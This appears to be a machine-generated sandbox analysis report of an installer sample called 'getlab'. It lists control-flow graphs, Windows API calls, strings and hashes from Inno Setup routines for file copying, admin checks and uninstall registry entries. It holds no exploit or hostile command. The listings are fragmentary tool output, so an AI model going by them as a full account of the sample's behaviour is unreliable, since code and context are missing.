10 API calls 53482->53492 53486 4213aa SetMenu 53483->53486 53484->53470 53493 408d1c 19 API calls 53484->53493 53486->53474 53488 421362 53487->53488 53489 42137b 53487->53489 53491 421375 SetMenu 53488->53491 53495 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53489->53495 53491->53489 53492->53467 53493->53484 53494->53473 53495->53474 53496->53477 53497->53482
                                                                          Strings
                                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0047099C
                                                                          • Incrementing shared file count (64-bit)., xrefs: 00471392
                                                                          • Existing file has a later time stamp. Skipping., xrefs: 00470BEF
                                                                          • Failed to strip read-only attribute., xrefs: 00470CF3
                                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 00470C6D
                                                                          • Uninstaller requires administrator: %s, xrefs: 00470F95
                                                                          • Installing the file., xrefs: 00470D29
                                                                          • Time stamp of our file: %s, xrefs: 004707BB
                                                                          • p%G, xrefs: 0047151A
                                                                          • , xrefs: 004709EF, 00470BC0, 00470C3E
                                                                          • Dest filename: %s, xrefs: 004706B4
                                                                          • Time stamp of our file: (failed to read), xrefs: 004707C7
                                                                          • Version of our file: (none), xrefs: 0047091C
                                                                          • Same time stamp. Skipping., xrefs: 00470B75
                                                                          • Version of our file: %u.%u.%u.%u, xrefs: 00470910
                                                                          • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470AD5
                                                                          • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470AE4
                                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D1A
                                                                          • Incrementing shared file count (32-bit)., xrefs: 004713AB
                                                                          • Couldn't read time stamp. Skipping., xrefs: 00470B55
                                                                          • -- File entry --, xrefs: 0047051B
                                                                          • Non-default bitness: 32-bit, xrefs: 004706DB
                                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C0C
                                                                          • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470AF0
                                                                          • @, xrefs: 004705D0
                                                                          • Non-default bitness: 64-bit, xrefs: 004706CF
                                                                          • Time stamp of existing file: (failed to read), xrefs: 00470857
                                                                          • Existing file is a newer version. Skipping., xrefs: 00470A22
                                                                          • Will register the file (a type library) later., xrefs: 00471319
                                                                          • InUn, xrefs: 00470F65
                                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470CB6
                                                                          • Dest file exists., xrefs: 004707DB
                                                                          • Same version. Skipping., xrefs: 00470B05
                                                                          • .tmp, xrefs: 00470DD7
                                                                          • Will register the file (a DLL/OCX) later., xrefs: 00471325
                                                                          • Time stamp of existing file: %s, xrefs: 0047084B
                                                                          • Version of existing file: (none), xrefs: 00470B1A
                                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 004707EE
                                                                          • Dest file is protected by Windows File Protection., xrefs: 0047070D
                                                                          • Stripped read-only attribute., xrefs: 00470CE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$p%G
                                                                          • API String ID: 0-1519224904
                                                                          • Opcode ID: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                          • Instruction ID: 29ad728ada19ee594bb20a6f10617e7c4442303fd1b73b354b0c7f106615fe65
                                                                          • Opcode Fuzzy Hash: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                          • Instruction Fuzzy Hash: 64928534A0528CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392C7789E45CB59

                                                                          Control-flow Graph

                                                                          control_flow_graph 1546 42e094-42e0a5 1547 42e0b0-42e0d5 AllocateAndInitializeSid 1546->1547 1548 42e0a7-42e0ab 1546->1548 1549 42e27f-42e287 1547->1549 1550 42e0db-42e0f8 GetVersion 1547->1550 1548->1549 1551 42e111-42e113 1550->1551 1552 42e0fa-42e10f GetModuleHandleA GetProcAddress 1550->1552 1553 42e115-42e123 CheckTokenMembership 1551->1553 1554 42e13a-42e154 GetCurrentThread OpenThreadToken 1551->1554 1552->1551 1555 42e261-42e277 FreeSid 1553->1555 1556 42e129-42e135 1553->1556 1557 42e156-42e160 GetLastError 1554->1557 1558 42e18b-42e1b3 GetTokenInformation 1554->1558 1556->1555 1561 42e162-42e167 call 4031bc 1557->1561 1562 42e16c-42e17f GetCurrentProcess OpenProcessToken 1557->1562 1559 42e1b5-42e1bd GetLastError 1558->1559 1560 42e1ce-42e1f2 call 402648 GetTokenInformation 1558->1560 1559->1560 1563 42e1bf-42e1c9 call 4031bc * 2 1559->1563 1572 42e200-42e208 1560->1572 1573 42e1f4-42e1fe call 4031bc * 2 1560->1573 1561->1549 1562->1558 1566 42e181-42e186 call 4031bc 1562->1566 1563->1549 1566->1549 1575 42e20a-42e20b 1572->1575 1576 42e23b-42e259 call 402660 CloseHandle 1572->1576 1573->1549 1579 42e20d-42e220 EqualSid 1575->1579 1583 42e222-42e22f 1579->1583 1584 42e237-42e239 1579->1584 1583->1584 1587 42e231-42e235 1583->1587 1584->1576 1584->1579 1587->1576
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                                          • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                                          • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                          • API String ID: 2252812187-1888249752
                                                                          • Opcode ID: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                          • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                                          • Opcode Fuzzy Hash: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                          • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79

                                                                          Control-flow Graph

                                                                          control_flow_graph 1610 450294-4502a1 1611 4502a7-4502b4 GetVersion 1610->1611 1612 450350-45035a 1610->1612 1611->1612 1613 4502ba-4502d0 LoadLibraryA 1611->1613 1613->1612 1614 4502d2-45034b GetProcAddress * 6 1613->1614 1614->1612
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                                          • GetProcAddress.KERNEL32(6E350000,RmStartSession), ref: 004502DD
                                                                          • GetProcAddress.KERNEL32(6E350000,RmRegisterResources), ref: 004502F2
                                                                          • GetProcAddress.KERNEL32(6E350000,RmGetList), ref: 00450307
                                                                          • GetProcAddress.KERNEL32(6E350000,RmShutdown), ref: 0045031C
                                                                          • GetProcAddress.KERNEL32(6E350000,RmRestart), ref: 00450331
                                                                          • GetProcAddress.KERNEL32(6E350000,RmEndSession), ref: 00450346
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                          • API String ID: 1968650500-3419246398
                                                                          • Opcode ID: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                                          • Instruction ID: 86b2f7b41730535ff8ff974bf0b660ab9cb9644c053cd973342487371e557a0c
                                                                          • Opcode Fuzzy Hash: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                                          • Instruction Fuzzy Hash: EF11B3B5510301EBD610FB65BF46A2E37EAE728715B08063FE904962A2CB7C8844CF9C

                                                                          Control-flow Graph

                                                                          control_flow_graph 1674 423c04-423c38 1675 423c3a-423c3b 1674->1675 1676 423c6c-423c83 call 423b60 1674->1676 1678 423c3d-423c59 call 40b434 1675->1678 1681 423ce4-423ce9 1676->1681 1682 423c85 1676->1682 1711 423c5b-423c63 1678->1711 1712 423c68-423c6a 1678->1712 1684 423ceb 1681->1684 1685 423d1f-423d24 1681->1685 1686 423c8b-423c8e 1682->1686 1687 423d48-423d58 1682->1687 1688 423cf1-423cf9 1684->1688 1689 423fa9-423fb1 1684->1689 1692 424092-4240a0 IsIconic 1685->1692 1693 423d2a-423d2d 1685->1693 1690 423c90 1686->1690 1691 423cbd-423cc0 1686->1691 1694 423d63-423d6b call 42418c 1687->1694 1695 423d5a-423d5f 1687->1695 1698 423f0b-423f32 SendMessageA 1688->1698 1699 423cff-423d04 1688->1699 1701 42414a-424152 1689->1701 1706 423fb7-423fc2 call 4181d8 1689->1706 1702 423c96-423c99 1690->1702 1703 423dee-423dfe call 423b7c 1690->1703 1707 423da1-423da8 1691->1707 1708 423cc6-423cc7 1691->1708 1700 4240a6-4240b1 GetFocus 1692->1700 1692->1701 1704 423d33-423d34 1693->1704 1705 4240ce-4240e3 call 424848 1693->1705 1694->1701 1709 423d70-423d78 call 4241d4 1695->1709 1710 423d61-423d84 call 423b7c 1695->1710 1698->1701 1713 424042-42404d 1699->1713 1714 423d0a-423d0b 1699->1714 1700->1701 1722 4240b7-4240c0 call 41efec 1700->1722 1715 424169-42416f 1701->1715 1723 423e16-423e32 PostMessageA call 423b7c 1702->1723 1724 423c9f-423ca2 1702->1724 1703->1701 1717 4240e5-4240ec 1704->1717 1718 423d3a-423d3d 1704->1718 1705->1701 1706->1701 1767 423fc8-423fd7 call 4181d8 IsWindowEnabled 1706->1767 1707->1701 1727 423dae-423db5 1707->1727 1728 423f37-423f3e 1708->1728 1729 423ccd-423cd0 1708->1729 1709->1701 1710->1701 1711->1715 1712->1676 1712->1678 1713->1701 1733 424053-424065 1713->1733 1730 423d11-423d14 1714->1730 1731 42406a-424075 1714->1731 1744 424103-424116 call 424524 1717->1744 1745 4240ee-424101 call 4244cc 1717->1745 1734 423d43 1718->1734 1735 424118-42411f 1718->1735 1722->1701 1782 
4240c6-4240cc SetFocus 1722->1782 1723->1701 1741 423ca8-423cab 1724->1741 1742 423e9d-423ea4 1724->1742 1727->1701 1747 423dbb-423dc1 1727->1747 1728->1701 1737 423f44-423f49 call 404e54 1728->1737 1748 423cd6-423cd9 1729->1748 1749 423e37-423e57 call 423b7c 1729->1749 1753 423d1a 1730->1753 1754 423f4e-423f56 1730->1754 1731->1701 1756 42407b-42408d 1731->1756 1733->1701 1755 424143-424144 call 423b7c 1734->1755 1751 424132-424141 1735->1751 1752 424121-424130 1735->1752 1737->1701 1762 423cb1-423cb2 1741->1762 1763 423dc6-423dd4 IsIconic 1741->1763 1764 423ea6-423eb9 call 423b0c 1742->1764 1765 423ed7-423ee8 call 423b7c 1742->1765 1744->1701 1745->1701 1747->1701 1768 423e03-423e11 call 424170 1748->1768 1769 423cdf 1748->1769 1795 423e7b-423e98 call 423a7c PostMessageA 1749->1795 1796 423e59-423e76 call 423b0c PostMessageA 1749->1796 1751->1701 1752->1701 1753->1755 1754->1701 1780 423f5c-423f63 1754->1780 1791 424149 1755->1791 1756->1701 1783 423cb8 1762->1783 1784 423d89-423d91 1762->1784 1773 423de2-423de9 call 423b7c 1763->1773 1774 423dd6-423ddd call 423bb8 1763->1774 1808 423ecb-423ed2 call 423b7c 1764->1808 1809 423ebb-423ec5 call 41ef50 1764->1809 1802 423eea-423ef0 call 41ee9c 1765->1802 1803 423efe-423f06 call 423a7c 1765->1803 1767->1701 1799 423fdd-423fec call 4181d8 IsWindowVisible 1767->1799 1768->1701 1769->1755 1773->1701 1774->1701 1780->1701 1794 423f69-423f78 call 4181d8 IsWindowEnabled 1780->1794 1782->1701 1783->1755 1784->1701 1797 423d97-423d9c call 422c44 1784->1797 1791->1701 1794->1701 1824 423f7e-423f94 call 412308 1794->1824 1795->1701 1796->1701 1797->1701 1799->1701 1825 423ff2-42403d GetFocus call 4181d8 SetFocus call 415238 SetFocus 1799->1825 1822 423ef5-423ef8 1802->1822 1803->1701 1808->1701 1809->1808 1822->1803 1824->1701 1830 423f9a-423fa4 1824->1830 1825->1701 1830->1701
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                          • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                                          • Opcode Fuzzy Hash: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                          • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09

                                                                          Control-flow Graph

                                                                          (graph rendering: basic-block and edge listing not reproduced; API calls visible in the graph: LoadBitmapA, GetSystemMenu, AppendMenuA)
                                                                          APIs
                                                                            • Part of subcall function 00494DD8: GetWindowRect.USER32(00000000), ref: 00494DEE
                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046759B
                                                                            • Part of subcall function 0041D6A8: GetObjectA.GDI32(?,00000018,004675B5), ref: 0041D6D3
                                                                            • Part of subcall function 00466FA8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                            • Part of subcall function 00466968: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                                            • Part of subcall function 0049505C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495066
                                                                            • Part of subcall function 0042ED30: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                            • Part of subcall function 0042ED30: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                            • Part of subcall function 00494D28: 73A1A570.USER32(00000000,?,?,?), ref: 00494D4A
                                                                            • Part of subcall function 00494D28: SelectObject.GDI32(?,00000000), ref: 00494D70
                                                                            • Part of subcall function 00494D28: 73A1A480.USER32(00000000,?,00494DCE,00494DC7,?,00000000,?,?,?), ref: 00494DC1
                                                                            • Part of subcall function 0049504C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495056
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0216FB00,02171860,?,?,02171890,?,?,021718E0,?), ref: 00468225
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468236
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046824E
                                                                            • Part of subcall function 0042A054: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A06A
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                          • String ID: $(Default)$STOPIMAGE
                                                                          • API String ID: 3271511185-770201673
                                                                          • Opcode ID: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                          • Instruction ID: b2f63b4b9f8df581d735fd8ef5c85857eef1c350e3dafc85bc3b179d47d789c4
                                                                          • Opcode Fuzzy Hash: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                          • Instruction Fuzzy Hash: FCF2D6387005148FCB00EB69D9D5F9973F1BF49304F1582BAE9049B36ADB74AC46CB9A
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: unins$unins???.*
                                                                          • API String ID: 3541575487-1009660736
                                                                          • Opcode ID: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                          • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                                          • Opcode Fuzzy Hash: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                          • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                                          • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                                          Similarity
                                                                          • API ID: ErrorFileFindFirstLast
                                                                          • String ID:
                                                                          • API String ID: 873889042-0
                                                                          • Opcode ID: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                          • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                                          • Opcode Fuzzy Hash: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                          • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                                          APIs
                                                                          • GetVersion.KERNEL32(000003E9,0046DF9A), ref: 0046DF0E
                                                                          • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,000003E9,0046DF9A), ref: 0046DF2A
                                                                          Similarity
                                                                          • API ID: CreateInstanceVersion
                                                                          • String ID:
                                                                          • API String ID: 1462612201-0
                                                                          • Opcode ID: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                          • Instruction ID: 830c4b43a8f201c084d489d1d0538b8be171f1220f730b3634288a605713aaeb
                                                                          • Opcode Fuzzy Hash: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                          • Instruction Fuzzy Hash: 08F0A031B853009EEB14E7A9DC46B4A37C0BB65328F4000BBF044972D2E3AC8890875F
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                          • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                                          • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                          • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                          • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                          • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                          • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                          • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                                          • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                          • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F534
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                          • Instruction ID: dfc14921be52f7ae21963fbc3fbcd64f7f6a072f88f97ccbdbccca1c2d2fc057
                                                                          • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                          • Instruction Fuzzy Hash: 9FD09E7220011DBB9B00DE99E840C6B73ADAB88710BD09926F945C7642D634ED9197A5

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 0046EC64: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                            • Part of subcall function 0046ECD4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                          • RegCloseKey.ADVAPI32(?,0046F51D,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F568,?,?,0049C1D0,00000000), ref: 0046F510
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Close
                                                                          • String ID: " /SILENT$5.5.1 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                          • API String ID: 3391052094-213252641
                                                                          • Opcode ID: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                                          • Instruction ID: b1500e3f1927c4d0668730226bdd95c12c24136f653289305a03eef3c2fa698f
                                                                          • Opcode Fuzzy Hash: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
